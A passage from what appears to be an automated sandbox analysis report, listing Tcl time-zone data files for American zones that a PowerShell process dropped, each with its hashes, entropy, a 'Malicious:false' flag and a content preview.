                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Mendoza) {.. {-9223372036854775808 -16516 0 LMT}.. {-2372095484 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2080
                                                                                                                                                                                                                      Entropy (8bit):3.7580685839169545
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5oQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0NC:qBu3pfe92jCs/VOHv2kdeRtnxafwwfFP
                                                                                                                                                                                                                      MD5:212D13CE27AF114A8EC2E04023D218C4
                                                                                                                                                                                                                      SHA1:C4C5F86BC6EC0D5EA4C9CF199309D085767B97E8
                                                                                                                                                                                                                      SHA-256:A05B6708DEFF0607396BFC6661C2287341C3432841AE353D94A67AC742B5FAFA
                                                                                                                                                                                                                      SHA-512:CE7201EEA6A86FB49641410D2EEE4030EDB1B96F3218D764762F5AE23883C796F5742ED69CEC985A9D3582D6C72ED74114DE81508F6DEB4B54865B6974ADC965
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Rio_Gallegos) {.. {-9223372036854775808 -16612 0 LMT}.. {-2372095388 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2011
                                                                                                                                                                                                                      Entropy (8bit):3.7415813345133975
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5NPuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0wF:72u3pfe92jCs/VOHv2kdeRtnxafww3mz
                                                                                                                                                                                                                      MD5:A06C33CDFD7E7B630CB1DF34E72E61E5
                                                                                                                                                                                                                      SHA1:694826B9B910DA0BD70A9CB547C26E6838B08111
                                                                                                                                                                                                                      SHA-256:CAEFC60F2F36EF9FFE0C5921C3C392DE1E95755683A96C1C4EC0BA2C242A4D84
                                                                                                                                                                                                                      SHA-512:D6696A6C14EECF2B77EC586F40137BDD95E5CE5C5193570C809FAB9E5FCA4B8744283CEB6818E525C73F6EFF657274410B2622902EE8C15912C8D5F5FA5C805E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Salta) {.. {-9223372036854775808 -15700 0 LMT}.. {-2372096300 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2106
                                                                                                                                                                                                                      Entropy (8bit):3.747934819596411
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5vXxuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0K:hUu3pfe92jCs/VOHv2kdeRtnxafwwkFl
                                                                                                                                                                                                                      MD5:32A50D0ABF408D9E59C0580D5B8CC472
                                                                                                                                                                                                                      SHA1:EA5BB8860982F8BAFEAEFDE1D6ACD440DA132DFE
                                                                                                                                                                                                                      SHA-256:41B2C25E42146A76934B866061BB3245B8ADA0FF4E1BFBA6F8842A30BDD5C132
                                                                                                                                                                                                                      SHA-512:E5D2521A4EF53AAD3E74506708EC2768C4D2EE8D6D014DCCF4A6DC290B713B4D46021B66527548C35004E10D753E1B685EEFD55BBE7BF01EC6104D7D8AAC4403
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Juan) {.. {-9223372036854775808 -16444 0 LMT}.. {-2372095556 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2081
                                                                                                                                                                                                                      Entropy (8bit):3.7399269084699975
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5MDuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafw6bS2nZSbdI:yCu3pfe92jCs/VOHv2kdeRtnxafwWnZr
                                                                                                                                                                                                                      MD5:FB06B66F5D41709C7E85C8B1E9BFCFA0
                                                                                                                                                                                                                      SHA1:D5C0C4B12C6190856C300321B1C106C7474BA54B
                                                                                                                                                                                                                      SHA-256:A43B35F25E54EF359D046E33281C0A978F0EE8811C93A6809F1F65750878BBB6
                                                                                                                                                                                                                      SHA-512:D445F46D6A17A075AD995885E45234A711F53BF3FE2DFC6DFBB611E8AC154B10C91E137927DD66D6A7C596A93BAE5DE283796F341B5095FA0DD05595E1C3A077
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Luis) {.. {-9223372036854775808 -15924 0 LMT}.. {-2372096076 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2105
                                                                                                                                                                                                                      Entropy (8bit):3.741704529449777
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5yZujuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OSf:suiu3pfe92jCs/VOHv2kdeRtnxafww3w
                                                                                                                                                                                                                      MD5:D9497141EC0DC172E5FF5304FED0BE6B
                                                                                                                                                                                                                      SHA1:CD20A4F0C127A84791093010D59DF119DD32340A
                                                                                                                                                                                                                      SHA-256:0F7DB23E1280FC19A1FB716E09A9699ADA2AAE24084CAD472B4C325CC9783CCF
                                                                                                                                                                                                                      SHA-512:0B71952055013CD6045ED209FD98168083550655FAB91B7870C92098E40C4FE6827EAAF922D34ECE28298CBB14327A76AD6780D480E552F52F865AA11A4AA083
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2075
                                                                                                                                                                                                                      Entropy (8bit):3.7445758155279836
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                                                                                                      MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                                                                                                      SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                                                                                                      SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                                                                                                      SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):199
                                                                                                                                                                                                                      Entropy (8bit):4.893042770292303
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                                                                                                      MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                                                                                                      SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                                                                                                      SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                                                                                                      SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7944
                                                                                                                                                                                                                      Entropy (8bit):3.5156463862656775
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                                                                                                      MD5:181203CAD98E94355B9914A205514904
                                                                                                                                                                                                                      SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                                                                                                      SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                                                                                                      SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):187
                                                                                                                                                                                                                      Entropy (8bit):4.791603790249234
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                                                                                                      MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                                                                                                      SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                                                                                                      SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                                                                                                      SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):177
                                                                                                                                                                                                                      Entropy (8bit):4.812527147763069
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                                                                                                      MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                                                                                                      SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                                                                                                      SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                                                                                                      SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2012
                                                                                                                                                                                                                      Entropy (8bit):3.703391569010329
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                                                                                                      MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                                                                                                      SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                                                                                                      SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                                                                                                      SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2073
                                                                                                                                                                                                                      Entropy (8bit):4.021485901155292
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:56hey9WUQwuz/V/NF01Y3A6S++S+vS+QQS+1S+9fS+BrS+HoS+8S+/N5S+5zNZf+:5pUIdFS1Y3FUlWQnH7eelN5Lh9LY5Lj
                                                                                                                                                                                                                      MD5:4655AE5AB9C39CA05C1FF36FC366679F
                                                                                                                                                                                                                      SHA1:F3F1D08EC35907A8F45AA2CFD097F6DCCA75C9B8
                                                                                                                                                                                                                      SHA-256:A6233E5BB0D3B30D0E3B94CD797718041AC3C2E75B387D6646A5C0376C5591CD
                                                                                                                                                                                                                      SHA-512:3915B845A312147C5B047096033B3D153E4E83AF4C8E4AAA73C8D12E2A8386CFE8EC4568730F9F28863017A60622DD9CC7D97991C966779B4068BC29F6C6B2B3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):648
                                                                                                                                                                                                                      Entropy (8bit):4.251560000277241
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                                                                                                      MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                                                                                                      SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                                                                                                      SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                                                                                                      SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                      Entropy (8bit):3.8842563546204225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                                                                                                      MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                                                                                                      SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                                                                                                      SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                                                                                                      SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
